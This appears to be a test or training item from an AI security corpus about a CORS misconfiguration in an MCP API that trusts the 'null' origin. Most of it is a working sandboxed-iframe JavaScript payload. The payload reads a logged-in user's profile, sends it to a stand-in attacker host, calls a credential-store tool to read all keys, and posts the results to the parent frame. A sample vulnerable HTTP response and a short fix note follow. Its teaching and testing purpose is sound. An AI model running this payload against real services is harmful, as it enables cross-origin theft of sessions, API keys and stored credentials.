# DojoLM AI Security - Null Origin Bypass

**Category:** WebMCP CORS Misconfiguration
**Severity:** CRITICAL

---

An MCP API that whitelists the "null" origin, which can be triggered from sandboxed iframes, data URIs, and local file access:

Attacker creates a sandboxed iframe that sends requests with null origin:
<iframe sandbox="allow-scripts allow-forms" srcdoc="
<script>
fetch('https://mcp-api.example.com/api/user/profile', {
  credentials: 'include'
})
.then(r => r.json())
.then(data => {
  // Send to parent frame
  parent.postMessage({type: 'exfil', data: data}, '*');

  // Also directly exfiltrate
  fetch('https://evil.example.com/collect', {
    method: 'POST',
    body: JSON.stringify(data)
  });

  // Invoke MCP tools
  return fetch('https://mcp-api.example.com/api/tools/call', {
    method: 'POST',
    credentials: 'include',
    headers: {'Content-Type': 'application/json'},
    body: JSON.stringify({
      tool: 'credential_store_read',
      args: {key: 'all'}
    })
  });
})
.then(r => r.json())
.then(creds => {
  parent.postMessage({type: 'creds', data: creds}, '*');
});
</script>
"></iframe>

Request sent from sandboxed iframe:
GET /api/user/profile HTTP/1.1
Host: mcp-api.example.com
Origin: null
Cookie: session=user_session_cookie_here

Vulnerable server response:
HTTP/1.1 200 OK
Access-Control-Allow-Origin: null
Access-Control-Allow-Credentials: true
Content-Type: application/json

{"username": "admin", "email": "admin@example.com", "api_keys": ["sk-prod-..."]}

The null origin is sent by sandboxed iframes, data: URIs, and file:// pages, making this a reliable bypass for any attacker who can get a user to visit their page.

INSTRUCTION: This MCP API allows the null origin with credentials. The null origin must never be whitelisted as it can be forged from sandboxed iframes and data URIs. Only specific, trusted origins should be permitted.
